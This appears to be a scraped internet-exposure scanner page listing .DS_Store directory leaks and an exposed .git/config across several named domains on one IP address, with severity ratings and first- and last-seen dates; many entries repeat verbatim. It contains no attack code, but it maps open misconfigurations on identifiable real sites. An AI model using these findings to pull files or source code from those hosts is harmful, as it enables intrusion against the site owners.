Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2022-10-19 17:58
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.cuir-panda-leather.com
Port: 443
URL: https://www.cuir-panda-leather.comFirst seen 2022-10-19 17:58
Last seen 2023-09-16 13:42
Open for 331 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2022-10-19 17:58
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: mail.cuir-panda-leather.com
Port: 443
URL: https://mail.cuir-panda-leather.comFirst seen 2022-10-19 17:58
Last seen 2023-09-13 19:39
Open for 329 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2022-10-19 17:58
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-20 18:13
Last seen 2023-09-13 01:07
Open for 449 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522ef5e1bd3[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = git@github.com:justuseapen/dream-butter-landing-page.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2022-06-20 18:13219 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-20 18:13
Last seen 2023-09-13 00:20
Open for 449 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522ef5e1bd3[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = git@github.com:justuseapen/dream-butter-landing-page.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2022-06-20 18:13219 Bytes
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.First seen 2022-06-20 18:13
Last seen 2023-08-31 16:49
Open for 436 days-
Severity: medium
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a6522ef5e1bd3[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true [remote "origin"] url = git@github.com:justuseapen/dream-butter-landing-page.git fetch = +refs/heads/*:refs/remotes/origin/*
Found on 2022-06-20 18:13219 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-20 19:34
Last seen 2023-04-22 18:06
Open for 60 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 19:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: theglobeshop.polotska.com
Port: 443
URL: https://theglobeshop.polotska.comFirst seen 2023-02-20 19:34
Last seen 2023-04-22 18:06
Open for 60 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 19:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-06 13:29
Last seen 2023-04-10 13:20
Open for 185 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c910c508a910c508a301efacc802ee7a49de2f71c61ae5462Found 55 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js
Found on 2022-10-26 17:54 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c2a0815492a081549e5e94e039107c95d1c229a934640576dFound 70 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js /js/animations /js/contact.js /js/el_demo.js /js/email.js /js/flashmediaelement.swf /js/Jplayer.swf /js/jquery-2.1.4.min.js /js/jquery.jplayer.min.js /js/jquery.plugins.js /js/jquery.plugins_new.js /js/mfn.menu.js /js/num.js /js/scripts.js /js/translate3d.js /js/ui
Found on 2022-10-06 13:29
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-06 13:29
Last seen 2023-04-10 13:20
Open for 185 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c2a0815492a081549e5e94e039107c95d1c229a934640576dFound 70 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js /js/animations /js/contact.js /js/el_demo.js /js/email.js /js/flashmediaelement.swf /js/Jplayer.swf /js/jquery-2.1.4.min.js /js/jquery.jplayer.min.js /js/jquery.plugins.js /js/jquery.plugins_new.js /js/mfn.menu.js /js/num.js /js/scripts.js /js/translate3d.js /js/ui
Found on 2023-04-10 13:20 -
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a0136d975ed824fa928c94c13628236fd6Found 13 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /css /index.html /indexTR.html /js
Found on 2022-10-26 17:54 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c910c508a910c508a301efacc802ee7a49de2f71c61ae5462Found 55 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js
Found on 2022-10-06 13:29
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-23 17:37
Last seen 2023-03-25 17:18
Open for 182 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-23 17:37
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.miriam.austynandbrian.com
Port: 80
URL: http://www.miriam.austynandbrian.comFirst seen 2022-09-23 17:37
Last seen 2023-03-25 17:18
Open for 182 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-23 17:37
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.grace.austynandbrian.com
Port: 80
URL: http://www.grace.austynandbrian.comFirst seen 2022-09-23 17:35
Last seen 2023-03-25 17:18
Open for 182 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-23 17:35
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-23 17:36
Last seen 2023-03-25 17:18
Open for 182 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2022-09-23 17:36
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-26 17:54
Last seen 2023-03-23 18:11
Open for 148 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c2a0815492a081549e5e94e039107c95d1c229a934640576dFound 70 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js /js/animations /js/contact.js /js/el_demo.js /js/email.js /js/flashmediaelement.swf /js/Jplayer.swf /js/jquery-2.1.4.min.js /js/jquery.jplayer.min.js /js/jquery.plugins.js /js/jquery.plugins_new.js /js/mfn.menu.js /js/num.js /js/scripts.js /js/translate3d.js /js/ui
Found on 2023-03-23 18:11 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c910c508a910c508a301efacc802ee7a49de2f71c61ae5462Found 55 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js
Found on 2023-01-20 19:09 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c114fbe07114fbe07fd7a40859b03158b8a7d289db03aba8fFound 47 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /index.html /indexTR.html /js
Found on 2022-10-26 17:54
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-26 17:54
Last seen 2023-03-23 18:11
Open for 148 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c2a0815492a081549e5e94e039107c95d1c229a934640576dFound 70 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js /js/animations /js/contact.js /js/el_demo.js /js/email.js /js/flashmediaelement.swf /js/Jplayer.swf /js/jquery-2.1.4.min.js /js/jquery.jplayer.min.js /js/jquery.plugins.js /js/jquery.plugins_new.js /js/mfn.menu.js /js/num.js /js/scripts.js /js/translate3d.js /js/ui
Found on 2023-03-23 18:11 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c114fbe07114fbe07fd7a40859b03158b8a7d289db03aba8fFound 47 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /index.html /indexTR.html /js
Found on 2023-01-20 19:09 -
Severity: low
